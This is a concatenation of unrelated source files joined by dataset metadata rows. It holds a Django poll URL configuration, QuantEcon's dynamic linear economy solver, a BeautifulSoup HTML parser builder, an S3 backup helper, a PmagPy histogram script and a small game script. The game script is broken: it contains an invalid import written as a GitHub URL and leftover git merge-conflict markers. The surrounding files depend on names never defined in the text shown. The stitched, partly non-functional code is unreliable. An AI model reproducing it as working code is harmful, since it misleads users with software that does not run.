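# Illustrative note (an assumption about downstream use, not part of this
# module): views can look up a sort order from the registry by key, e.g.
#     orders = request.registry.settings['amnesia:orders']
#     sort = orders.get('title', orders['weight'])
# where 'weight' is documented above as the default order.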
|
bsd-2-clause
| -7,095,688,458,044,918,000
| 41.780488
| 80
| 0.54618
| false
| 4.088578
| false
| false
| false
|
theneurasthenicrat/whale4
|
polls/urls.py
|
1
|
2490
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from django.views.generic import TemplateView
from polls import views
uuid4="[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}"
urlpatterns = [
url(r'^$', views.home, name='home'),
url(r'^redirectPage/$', views.redirect_page, name='redirectPage'),
url(r'^choosePollType$', views.choose_poll_type, name='choosePollType'),
url(r'^candidateCreate/('+uuid4+')/$', views.candidate_create, name='candidateCreate'),
url(r'^dateCandidateCreate/('+uuid4+')/$', views.date_candidate_create, name='dateCandidateCreate'),
url(r'^manageCandidate/('+uuid4+')/$', views.manage_candidate, name='manageCandidate'),
url(r'^updatePoll/(' + uuid4 +')/$', views.update_voting_poll, name='updatePoll'),
url(r'^deleteCandidate/('+uuid4+')/([^/]+)/$', views.delete_candidate, name='deleteCandidate'),
url(r'^updateVote/('+uuid4+')/([^/]+)/$', views.update_vote, name='updateVote'),
url(r'^deleteVote/('+uuid4+')/([^/]+)/$', views.delete_vote, name='deleteVote'),
url(r'^deleteAnonymous/('+uuid4+')/([^/]+)/$', views.delete_anonymous, name='deleteAnonymous'),
url(r'^newPoll/(?P<choice>[^/]+)/$', views.new_poll, name='newPoll'),
url(r'^viewPoll/('+uuid4+')', views.view_poll, name='viewPoll'),
url(r'^status/('+uuid4+')', views.status, name='status'),
url(r'^viewPollSecret/('+uuid4+')/([^/]+)/$', views.view_poll_secret, name='viewPollSecret'),
url(r'^vote/('+uuid4+')', views.vote, name='vote'),
url(r'^invitation/('+uuid4+')/$', views.invitation, name='invitation'),
url(r'^admin/('+uuid4+')/$', views.admin_poll, name='admin'),
url(r'^resetPoll/('+uuid4+')/$', views.reset_poll, name='resetPoll'),
url(r'^advancedParameters/('+uuid4+')/$', views.advanced_parameters, name='advancedParameters'),
url(r'^deleteVotingPoll/(' + uuid4 +')/$', views.delete_poll, name='deleteVotingPoll'),
url(r'^certificate/('+uuid4+')', views.certificate, name='certificate'),
url(r'^results/('+uuid4+')', views.result_all, name='results'),
url(r'^viewResult/('+uuid4+')/([^/]+)/$', views.result_view, name='viewResult'),
url(r'^scores/('+uuid4+')/([^/]+)/$', views.result_scores, name='scores'),
url(r'^data/('+uuid4+')', views.data_page, name='data'),
url(r'^allData$', TemplateView.as_view(template_name='polls/all_data.html'), name='allData'),
url(r'^about$', TemplateView.as_view(template_name='polls/about.html'), name='about'),
]
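# Illustrative check (not part of the original URLconf; running this file
# directly would also require the project on the import path): the uuid4
# pattern above accepts canonical UUID4 strings, with or without hyphens.
if __name__ == "__main__":
    import re
    assert re.match(uuid4, "f47ac10b-58cc-4372-a567-0e02b2c3d479")
    assert re.match(uuid4, "f47ac10b58cc4372a5670e02b2c3d479")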
|
gpl-3.0
| -2,989,620,190,023,986,000
| 64.526316
| 104
| 0.627711
| false
| 3.104738
| false
| true
| false
|
oyamad/QuantEcon.py
|
quantecon/dle.py
|
1
|
14017
|
"""
Provides a class called DLE to convert and solve dynamic linear economics
(as set out in Hansen & Sargent (2013)) as LQ problems.
"""
import numpy as np
from .lqcontrol import LQ
from .matrix_eqn import solve_discrete_lyapunov
from .rank_nullspace import nullspace
class DLE(object):
r"""
This class is for analyzing dynamic linear economies, as set out in Hansen & Sargent (2013).
The planner's problem is to choose \{c_t, s_t, i_t, h_t, k_t, g_t\}_{t=0}^\infty to maximize
\max -(1/2) \mathbb{E} \sum_{t=0}^{\infty} \beta^t [(s_t - b_t).(s_t-b_t) + g_t.g_t]
subject to the linear constraints
\Phi_c c_t + \Phi_g g_t + \Phi_i i_t = \Gamma k_{t-1} + d_t
k_t = \Delta_k k_{t-1} + \Theta_k i_t
h_t = \Delta_h h_{t-1} + \Theta_h c_t
s_t = \Lambda h_{t-1} + \Pi c_t
and
z_{t+1} = A_{22} z_t + C_2 w_{t+1}
b_t = U_b z_t
d_t = U_d z_t
where h_{-1}, k_{-1}, and z_0 are given as initial conditions.
Section 5.5 of HS2013 describes how to map these matrices into those of
a LQ problem.
HS2013 sort the matrices defining the problem into three groups:
Information: A_{22}, C_2, U_b , and U_d characterize the motion of information
sets and of taste and technology shocks
Technology: \Phi_c, \Phi_g, \Phi_i, \Gamma, \Delta_k, and \Theta_k determine the
technology for producing consumption goods
Preferences: \Delta_h, \Theta_h, \Lambda, and \Pi determine the technology for
producing consumption services from consumer goods. A scalar discount factor \beta
determines the preference ordering over consumption services.
Parameters
----------
Information : tuple
Information is a tuple containing the matrices A_{22}, C_2, U_b, and U_d
Technology : tuple
Technology is a tuple containing the matrices \Phi_c, \Phi_g, \Phi_i, \Gamma,
\Delta_k, and \Theta_k
Preferences : tuple
Preferences is a tuple containing the matrices \Delta_h, \Theta_h, \Lambda,
\Pi, and the scalar \beta
"""
def __init__(self, information, technology, preferences):
# === Unpack the tuples which define information, technology and preferences === #
self.a22, self.c2, self.ub, self.ud = information
self.phic, self.phig, self.phii, self.gamma, self.deltak, self.thetak = technology
self.beta, self.llambda, self.pih, self.deltah, self.thetah = preferences
# === Computation of the dimension of the structural parameter matrices === #
self.nb, self.nh = self.llambda.shape
self.nd, self.nc = self.phic.shape
self.nz, self.nw = self.c2.shape
junk, self.ng = self.phig.shape
self.nk, self.ni = self.thetak.shape
# === Creation of various useful matrices === #
uc = np.hstack((np.eye(self.nc), np.zeros((self.nc, self.ng))))
ug = np.hstack((np.zeros((self.ng, self.nc)), np.eye(self.ng)))
phiin = np.linalg.inv(np.hstack((self.phic, self.phig)))
phiinc = uc.dot(phiin)
phiing = ug.dot(phiin)
b11 = - self.thetah.dot(phiinc).dot(self.phii)
a1 = self.thetah.dot(phiinc).dot(self.gamma)
a12 = np.vstack((self.thetah.dot(phiinc).dot(
self.ud), np.zeros((self.nk, self.nz))))
# === Creation of the A Matrix for the state transition of the LQ problem === #
a11 = np.vstack((np.hstack((self.deltah, a1)), np.hstack(
(np.zeros((self.nk, self.nh)), self.deltak))))
self.A = np.vstack((np.hstack((a11, a12)), np.hstack(
(np.zeros((self.nz, self.nk + self.nh)), self.a22))))
# === Creation of the B Matrix for the state transition of the LQ problem === #
b1 = np.vstack((b11, self.thetak))
self.B = np.vstack((b1, np.zeros((self.nz, self.ni))))
# === Creation of the C Matrix for the state transition of the LQ problem === #
self.C = np.vstack((np.zeros((self.nk + self.nh, self.nw)), self.c2))
# === Define R,W and Q for the payoff function of the LQ problem === #
self.H = np.hstack((self.llambda, self.pih.dot(uc).dot(phiin).dot(self.gamma), self.pih.dot(
uc).dot(phiin).dot(self.ud) - self.ub, -self.pih.dot(uc).dot(phiin).dot(self.phii)))
self.G = ug.dot(phiin).dot(
np.hstack((np.zeros((self.nd, self.nh)), self.gamma, self.ud, -self.phii)))
self.S = (self.G.T.dot(self.G) + self.H.T.dot(self.H)) / 2
self.nx = self.nh + self.nk + self.nz
self.n = self.ni + self.nh + self.nk + self.nz
self.R = self.S[0:self.nx, 0:self.nx]
self.W = self.S[self.nx:self.n, 0:self.nx]
self.Q = self.S[self.nx:self.n, self.nx:self.n]
# === Use quantecon's LQ code to solve our LQ problem === #
lq = LQ(self.Q, self.R, self.A, self.B,
self.C, N=self.W, beta=self.beta)
self.P, self.F, self.d = lq.stationary_values()
# === Construct output matrices for our economy using the solution to the LQ problem === #
self.A0 = self.A - self.B.dot(self.F)
self.Sh = self.A0[0:self.nh, 0:self.nx]
self.Sk = self.A0[self.nh:self.nh + self.nk, 0:self.nx]
self.Sk1 = np.hstack((np.zeros((self.nk, self.nh)), np.eye(
self.nk), np.zeros((self.nk, self.nz))))
self.Si = -self.F
self.Sd = np.hstack((np.zeros((self.nd, self.nh + self.nk)), self.ud))
self.Sb = np.hstack((np.zeros((self.nb, self.nh + self.nk)), self.ub))
self.Sc = uc.dot(phiin).dot(-self.phii.dot(self.Si) +
self.gamma.dot(self.Sk1) + self.Sd)
self.Sg = ug.dot(phiin).dot(-self.phii.dot(self.Si) +
self.gamma.dot(self.Sk1) + self.Sd)
self.Ss = self.llambda.dot(np.hstack((np.eye(self.nh), np.zeros(
(self.nh, self.nk + self.nz))))) + self.pih.dot(self.Sc)
# === Calculate eigenvalues of A0 === #
self.A110 = self.A0[0:self.nh + self.nk, 0:self.nh + self.nk]
self.endo = np.linalg.eigvals(self.A110)
self.exo = np.linalg.eigvals(self.a22)
# === Construct matrices for Lagrange Multipliers === #
self.Mk = -2 * np.asscalar(self.beta) * (np.hstack((np.zeros((self.nk, self.nh)), np.eye(
self.nk), np.zeros((self.nk, self.nz))))).dot(self.P).dot(self.A0)
self.Mh = -2 * np.asscalar(self.beta) * (np.hstack((np.eye(self.nh), np.zeros(
(self.nh, self.nk)), np.zeros((self.nh, self.nz))))).dot(self.P).dot(self.A0)
self.Ms = -(self.Sb - self.Ss)
self.Md = -(np.linalg.inv(np.vstack((self.phic.T, self.phig.T))).dot(
np.vstack((self.thetah.T.dot(self.Mh) + self.pih.T.dot(self.Ms), -self.Sg))))
self.Mc = -(self.thetah.T.dot(self.Mh) + self.pih.T.dot(self.Ms))
self.Mi = -(self.thetak.T.dot(self.Mk))
def compute_steadystate(self, nnc=2):
"""
Computes the non-stochastic steady-state of the economy.
Parameters
----------
nnc : array_like(float)
nnc is the location of the constant in the state vector x_t
"""
zx = np.eye(self.A0.shape[0])-self.A0
self.zz = nullspace(zx)
self.zz /= self.zz[nnc]
self.css = self.Sc.dot(self.zz)
self.sss = self.Ss.dot(self.zz)
self.iss = self.Si.dot(self.zz)
self.dss = self.Sd.dot(self.zz)
self.bss = self.Sb.dot(self.zz)
self.kss = self.Sk.dot(self.zz)
self.hss = self.Sh.dot(self.zz)
def compute_sequence(self, x0, ts_length=None, Pay=None):
"""
Simulate quantities and prices for the economy
Parameters
----------
x0 : array_like(float)
The initial state
ts_length : scalar(int)
Length of the simulation
Pay : array_like(float)
Vector to price an asset whose payout is Pay*xt
"""
lq = LQ(self.Q, self.R, self.A, self.B,
self.C, N=self.W, beta=self.beta)
xp, up, wp = lq.compute_sequence(x0, ts_length)
self.h = self.Sh.dot(xp)
self.k = self.Sk.dot(xp)
self.i = self.Si.dot(xp)
self.b = self.Sb.dot(xp)
self.d = self.Sd.dot(xp)
self.c = self.Sc.dot(xp)
self.g = self.Sg.dot(xp)
self.s = self.Ss.dot(xp)
# === Value of J-period risk-free bonds === #
# === See p.145: Equation (7.11.2) === #
e1 = np.zeros((1, self.nc))
e1[0, 0] = 1
self.R1_Price = np.empty((ts_length + 1, 1))
self.R2_Price = np.empty((ts_length + 1, 1))
self.R5_Price = np.empty((ts_length + 1, 1))
for i in range(ts_length + 1):
self.R1_Price[i, 0] = self.beta * e1.dot(self.Mc).dot(np.linalg.matrix_power(
self.A0, 1)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
self.R2_Price[i, 0] = self.beta**2 * e1.dot(self.Mc).dot(
np.linalg.matrix_power(self.A0, 2)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
self.R5_Price[i, 0] = self.beta**5 * e1.dot(self.Mc).dot(
np.linalg.matrix_power(self.A0, 5)).dot(xp[:, i]) / e1.dot(self.Mc).dot(xp[:, i])
# === Gross rates of return on 1-period risk-free bonds === #
self.R1_Gross = 1 / self.R1_Price
# === Net rates of return on J-period risk-free bonds === #
# === See p.148: log of gross rate of return, divided by j === #
self.R1_Net = np.log(1 / self.R1_Price) / 1
self.R2_Net = np.log(1 / self.R2_Price) / 2
self.R5_Net = np.log(1 / self.R5_Price) / 5
# === Value of asset whose payout vector is Pay*xt === #
# See p.145: Equation (7.11.1)
        if isinstance(Pay, np.ndarray):
self.Za = Pay.T.dot(self.Mc)
self.Q = solve_discrete_lyapunov(
self.A0.T * self.beta**0.5, self.Za)
self.q = self.beta / (1 - self.beta) * \
np.trace(self.C.T.dot(self.Q).dot(self.C))
self.Pay_Price = np.empty((ts_length + 1, 1))
self.Pay_Gross = np.empty((ts_length + 1, 1))
self.Pay_Gross[0, 0] = np.nan
for i in range(ts_length + 1):
self.Pay_Price[i, 0] = (xp[:, i].T.dot(self.Q).dot(
xp[:, i]) + self.q) / e1.dot(self.Mc).dot(xp[:, i])
for i in range(ts_length):
self.Pay_Gross[i + 1, 0] = self.Pay_Price[i + 1,
0] / (self.Pay_Price[i, 0] - Pay.dot(xp[:, i]))
return
def irf(self, ts_length=100, shock=None):
"""
Create Impulse Response Functions
Parameters
----------
ts_length : scalar(int)
Number of periods to calculate IRF
        shock : array_like(float)
Vector of shocks to calculate IRF to. Default is first element of w
"""
if type(shock) != np.ndarray:
# Default is to select first element of w
shock = np.vstack((np.ones((1, 1)), np.zeros((self.nw - 1, 1))))
self.c_irf = np.empty((ts_length, self.nc))
self.s_irf = np.empty((ts_length, self.nb))
self.i_irf = np.empty((ts_length, self.ni))
self.k_irf = np.empty((ts_length, self.nk))
self.h_irf = np.empty((ts_length, self.nh))
self.g_irf = np.empty((ts_length, self.ng))
self.d_irf = np.empty((ts_length, self.nd))
self.b_irf = np.empty((ts_length, self.nb))
for i in range(ts_length):
self.c_irf[i, :] = self.Sc.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.s_irf[i, :] = self.Ss.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.i_irf[i, :] = self.Si.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.k_irf[i, :] = self.Sk.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.h_irf[i, :] = self.Sh.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.g_irf[i, :] = self.Sg.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.d_irf[i, :] = self.Sd.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
self.b_irf[i, :] = self.Sb.dot(
np.linalg.matrix_power(self.A0, i)).dot(self.C).dot(shock).T
return
def canonical(self):
"""
Compute canonical preference representation
Uses auxiliary problem of 9.4.2, with the preference shock process reintroduced
Calculates pihat, llambdahat and ubhat for the equivalent canonical household technology
"""
Ac1 = np.hstack((self.deltah, np.zeros((self.nh, self.nz))))
Ac2 = np.hstack((np.zeros((self.nz, self.nh)), self.a22))
Ac = np.vstack((Ac1, Ac2))
Bc = np.vstack((self.thetah, np.zeros((self.nz, self.nc))))
Cc = np.vstack((np.zeros((self.nh, self.nw)), self.c2))
Rc1 = np.hstack((self.llambda.T.dot(self.llambda), -
self.llambda.T.dot(self.ub)))
Rc2 = np.hstack((-self.ub.T.dot(self.llambda), self.ub.T.dot(self.ub)))
Rc = np.vstack((Rc1, Rc2))
Qc = self.pih.T.dot(self.pih)
Nc = np.hstack(
(self.pih.T.dot(self.llambda), -self.pih.T.dot(self.ub)))
lq_aux = LQ(Qc, Rc, Ac, Bc, N=Nc, beta=self.beta)
P1, F1, d1 = lq_aux.stationary_values()
self.F_b = F1[:, 0:self.nh]
self.F_f = F1[:, self.nh:]
self.pihat = np.linalg.cholesky(self.pih.T.dot(
self.pih) + self.beta.dot(self.thetah.T).dot(P1[0:self.nh, 0:self.nh]).dot(self.thetah)).T
self.llambdahat = self.pihat.dot(self.F_b)
self.ubhat = - self.pihat.dot(self.F_f)
return
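if __name__ == '__main__':
    # Minimal illustrative sketch (the values follow the Hall-style one-good
    # growth economy used in the quantecon DLE lectures; matrix shapes match
    # the tuple layout documented in the class docstring above):
    gamma = np.array([[0.1], [0]])
    phi_c = np.array([[1], [0]])
    phi_g = np.array([[0], [1]])
    phi_i = np.array([[1], [-1e-5]])
    delta_k = np.array([[0.95]])
    theta_k = np.array([[1]])
    beta = np.array([[1 / 1.05]])
    l_lambda = np.array([[0]])
    pi_h = np.array([[1]])
    delta_h = np.array([[0.9]])
    theta_h = np.array([[1]])
    a22 = np.array([[1, 0, 0], [0, 0.8, 0], [0, 0, 0.5]])
    c2 = np.array([[0, 0], [1, 0], [0, 1]])
    ud = np.array([[5, 1, 0], [0, 0, 0]])
    ub = np.array([[30, 0, 0]])
    econ = DLE((a22, c2, ub, ud),
               (phi_c, phi_g, phi_i, gamma, delta_k, theta_k),
               (beta, l_lambda, pi_h, delta_h, theta_h))
    # Simulate 300 periods from h_{-1} = 5, k_{-1} = 150, z_0 = (1, 0, 0).
    econ.compute_sequence(np.array([[5], [150], [1], [0], [0]]), ts_length=300)
    print(econ.c[:, :5])  # first few periods of simulated consumption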
|
bsd-3-clause
| 668,505,785,645,585,400
| 41.475758
| 105
| 0.552615
| false
| 2.883563
| false
| false
| false
|
TheMuffinMan5930/NarutoBattle
|
attacking_system.py
|
1
|
1259
|
import gspread
import string
# NOTE: the next import in the original was written as
# import "https://github.com/TheMuffinMan5930/NarutoBattle/blob/master/Chat.py"
# which is not valid Python; Chat.py has to live on the local import path.
# import Chat
# sh, Player_Name, QuitGame and wsJitsus are expected to come from Chat.py /
# earlier game-setup code; they are not defined in this file.
try:
    Jitsu_Player = sh.worksheet(Player_Name + "- Jitsus")
    # Read the seven jitsu names from row 2, columns A..G.
    jitsus = [Jitsu_Player.acell(string.ascii_uppercase[col] + "2").value
              for col in range(7)]
    confirmation_of_jitsus = input(
        "Is it correct that you have {}, {}, {}, {}, {}, {}, {} "
        "as your jitsus? Y/N".format(*jitsus))
    if confirmation_of_jitsus == "Y":
        Jitsu_Player.update_acell("A1", "Ready")
    elif confirmation_of_jitsus == "N":
        QuitGame()  # Def this as well
except Exception:
    print("Error")
# turn progressing code here
# this is just the code I CAN do.
class Attack(object):
    def __init__(self):
        # The cell coordinates below are placeholders; fill in the real
        # row/column positions from the Jitsus worksheet (rows 19 - 22ish).
        self.coordinates_of_Jitsu = wsJitsus.cell(1, 1)
        self.range = wsJitsus.cell(1, 2)
        self.damage = wsJitsus.cell(1, 3)
        self.chakra_cost = wsJitsus.cell(1, 4)  # other attributes
        self.aim = wsJitsus.cell(1, 5)
        self.Jitsu_Name = wsJitsus.cell(1, 6)
        self.purchase_cost = wsJitsus.cell(1, 7)
        self.Jitsu_Rank = wsJitsus.cell(1, 8)
    # Resolved the leftover git merge conflict here in favour of keeping
    # the __str__ method from the HEAD side.
    def __str__(self):
        return "Your Jitsu has {}d".format(self.damage)
|
mit
| -8,263,799,134,107,539,000
| 37.030303
| 159
| 0.661355
| false
| 2.52008
| false
| false
| false
|
chimkentec/KodiMODo_rep
|
script.module.xbmcup/lib/xbmcup/bsoup4/builder/_htmlparser.py
|
1
|
8347
|
"""Use the HTMLParser library to parse HTML files that aren't too bad."""
__all__ = [
'HTMLParserTreeBuilder',
]
from HTMLParser import (
HTMLParser,
HTMLParseError,
)
import sys
import warnings
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
# argument, which we'd like to set to False. Unfortunately,
# http://bugs.python.org/issue13273 makes strict=True a better bet
# before Python 3.2.3.
#
# At the end of this file, we monkeypatch HTMLParser so that
# strict=True works well on Python 3.2.2.
major, minor, release = sys.version_info[:3]
CONSTRUCTOR_TAKES_STRICT = (
major > 3
or (major == 3 and minor > 2)
or (major == 3 and minor == 2 and release >= 3))
from ..element import (
CData,
Comment,
Declaration,
Doctype,
ProcessingInstruction,
)
from ..dammit import EntitySubstitution, UnicodeDammit
from ..builder import (
HTML,
HTMLTreeBuilder,
STRICT,
)
HTMLPARSER = 'html.parser'
class BeautifulSoupHTMLParser(HTMLParser):
def handle_starttag(self, name, attrs):
# XXX namespace
self.soup.handle_starttag(name, None, None, dict(attrs))
def handle_endtag(self, name):
self.soup.handle_endtag(name)
def handle_data(self, data):
self.soup.handle_data(data)
def handle_charref(self, name):
# XXX workaround for a bug in HTMLParser. Remove this once
# it's fixed.
if name.startswith('x'):
real_name = int(name.lstrip('x'), 16)
else:
real_name = int(name)
try:
data = unichr(real_name)
except (ValueError, OverflowError), e:
data = u"\N{REPLACEMENT CHARACTER}"
self.handle_data(data)
def handle_entityref(self, name):
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
if character is not None:
data = character
else:
data = "&%s;" % name
self.handle_data(data)
def handle_comment(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(Comment)
def handle_decl(self, data):
self.soup.endData()
if data.startswith("DOCTYPE "):
data = data[len("DOCTYPE "):]
self.soup.handle_data(data)
self.soup.endData(Doctype)
def unknown_decl(self, data):
if data.upper().startswith('CDATA['):
cls = CData
data = data[len('CDATA['):]
else:
cls = Declaration
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(cls)
def handle_pi(self, data):
self.soup.endData()
if data.endswith("?") and data.lower().startswith("xml"):
# "An XHTML processing instruction using the trailing '?'
# will cause the '?' to be included in data." - HTMLParser
# docs.
#
# Strip the question mark so we don't end up with two
# question marks.
data = data[:-1]
self.soup.handle_data(data)
self.soup.endData(ProcessingInstruction)
class HTMLParserTreeBuilder(HTMLTreeBuilder):
is_xml = False
features = [HTML, STRICT, HTMLPARSER]
def __init__(self, *args, **kwargs):
if CONSTRUCTOR_TAKES_STRICT:
kwargs['strict'] = False
self.parser_args = (args, kwargs)
def prepare_markup(self, markup, user_specified_encoding=None,
document_declared_encoding=None):
"""
:return: A 4-tuple (markup, original encoding, encoding
declared within markup, whether any characters had to be
replaced with REPLACEMENT CHARACTER).
"""
if isinstance(markup, unicode):
return markup, None, None, False
try_encodings = [user_specified_encoding, document_declared_encoding]
dammit = UnicodeDammit(markup, try_encodings, is_html=True)
return (dammit.markup, dammit.original_encoding,
dammit.declared_html_encoding,
dammit.contains_replacement_characters)
def feed(self, markup):
args, kwargs = self.parser_args
parser = BeautifulSoupHTMLParser(*args, **kwargs)
parser.soup = self.soup
try:
parser.feed(markup)
except HTMLParseError, e:
warnings.warn(RuntimeWarning(
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
raise e
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
# string.
#
# XXX This code can be removed once most Python 3 users are on 3.2.3.
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
import re
attrfind_tolerant = re.compile(
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
from html.parser import tagfind, attrfind
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = rawdata[i+1:k].lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
CONSTRUCTOR_TAKES_STRICT = True
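if __name__ == '__main__':
    # Minimal smoke test (illustrative only, not part of the original
    # module): drive the parser with a stub "soup" object that records
    # tree-building events, to show which handlers fire for a tiny document.
    class _EventRecorder(object):
        def __init__(self):
            self.events = []
        def handle_starttag(self, name, namespace, nsprefix, attrs):
            self.events.append(('start', name, attrs))
        def handle_endtag(self, name):
            self.events.append(('end', name))
        def handle_data(self, data):
            self.events.append(('data', data))
        def endData(self, containerClass=None):
            self.events.append(('endData', containerClass))
    parser = BeautifulSoupHTMLParser()
    parser.soup = _EventRecorder()
    parser.feed(u"<p class='x'>hi &amp; bye</p>")
    print(parser.soup.events)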
|
gpl-3.0
| -4,245,565,650,335,776,300
| 33.209016
| 318
| 0.567988
| false
| 3.952178
| false
| false
| false
|
nyodas/enjoliver
|
app/objs3.py
|
1
|
2316
|
"""
Interface with S3 to store / fetch backups
"""
import os
import time
import boto3
import logger
from configs import EnjoliverConfig
class S3Operator(object):
log = logger.get_logger(__file__)
def __init__(self, bucket_name):
ec = EnjoliverConfig(importer=__file__)
aws_id = ec.aws_id
aws_secret = ec.aws_secret
self.bucket_name = bucket_name
if not bucket_name:
self.log.error("bucket_name=%s" % bucket_name)
raise AttributeError("bucket_name is not defined: %s" % bucket_name)
if aws_id is None or aws_secret is None:
self.log.error("Missing the couple AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY")
raise EnvironmentError("Missing the couple AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY")
self.log.info("connect to bucket name: %s" % bucket_name)
self.s3 = boto3.resource('s3')
self.bucket = self.s3.Bucket(bucket_name)
def upload(self, source, dest):
if os.path.isfile(source) is False:
raise IOError(source)
obj = self.s3.Object(self.bucket_name, dest)
stats = os.stat(source)
metadata = {
"uploaded": "%d" % time.time(),
"created": "%d" % stats.st_ctime,
"modified": "%d" % stats.st_mtime,
"size": "%d" % stats.st_size
}
obj.put(Body=open(source, 'rb'), Metadata=metadata)
self.log.info("upload done source: %s dest: %s metadata: %s" % (source, dest, metadata))
def download(self, source, dest):
obj = self.s3.Object(self.bucket_name, source)
        r = obj.get()  # boto3's Object.get() accepts keyword arguments only
        with open(dest, 'wb') as f:
            f.write(r['Body'].read())  # public read() instead of _raw_stream
        self.log.info("download done source: %s dest: %s" % (source, dest))
def get_last_uploaded(self, prefix):
keys = []
self.log.debug("prefix use %s" % prefix)
for item in self.bucket.objects.all():
self.log.debug("list in bucket: %s" % item.key)
keys.append({"key": item.key, "last_modified": item.last_modified})
keys.sort(key=lambda k: k["last_modified"])
keys.reverse()
latest = keys[0]
key_name = latest["key"]
self.log.info("return latest upload: %s" % key_name)
return key_name
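if __name__ == '__main__':
    # Illustrative usage only: the bucket and file names below are made up,
    # and valid AWS credentials must be available via EnjoliverConfig.
    s3 = S3Operator("enjoliver-backups")
    s3.upload("/tmp/backup.tar.gz", "backups/backup.tar.gz")
    latest = s3.get_last_uploaded("backups/")
    s3.download(latest, "/tmp/restored.tar.gz")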
|
mit
| 7,340,518,615,331,652,000
| 33.058824
| 96
| 0.584629
| false
| 3.487952
| false
| false
| false
|
PmagPy/PmagPy
|
programs/histplot.py
|
1
|
1769
|
#!/usr/bin/env python
from pmagpy import pmag
from pmagpy import pmagplotlib
from matplotlib import pyplot as plt
import sys
import os
import numpy as np
import matplotlib
if matplotlib.get_backend() != "TkAgg":
    matplotlib.use("TkAgg")
from pmagpy import ipmag
def main():
"""
NAME
histplot.py
DESCRIPTION
makes histograms for data
OPTIONS
-h prints help message and quits
-f input file name
-b binsize
-fmt [svg,png,pdf,eps,jpg] specify format for image, default is svg
-sav save figure and quit
-F output file name, default is hist.fmt
-N don't normalize
-twin plot both normalized and un-normalized y axes
-xlab Label of X axis
-ylab Label of Y axis
INPUT FORMAT
single variable
SYNTAX
histplot.py [command line options] [<file]
"""
interactive = True
save_plots = False
if '-sav' in sys.argv:
save_plots = True
interactive = False
if '-h' in sys.argv:
print(main.__doc__)
sys.exit()
fmt = pmag.get_named_arg('-fmt', 'svg')
fname = pmag.get_named_arg('-f', '')
outfile = pmag.get_named_arg("-F", "")
norm = 1
if '-N' in sys.argv:
norm = 0
if '-twin' in sys.argv:
norm = - 1
binsize = pmag.get_named_arg('-b', 0)
if '-xlab' in sys.argv:
ind = sys.argv.index('-xlab')
xlab = sys.argv[ind+1]
else:
xlab = 'x'
data = []
if not fname:
print('-I- Trying to read from stdin... <ctrl>-c to quit')
data = np.loadtxt(sys.stdin, dtype=np.float)
ipmag.histplot(fname, data, outfile, xlab, binsize, norm,
fmt, save_plots, interactive)
if __name__ == "__main__":
main()
|
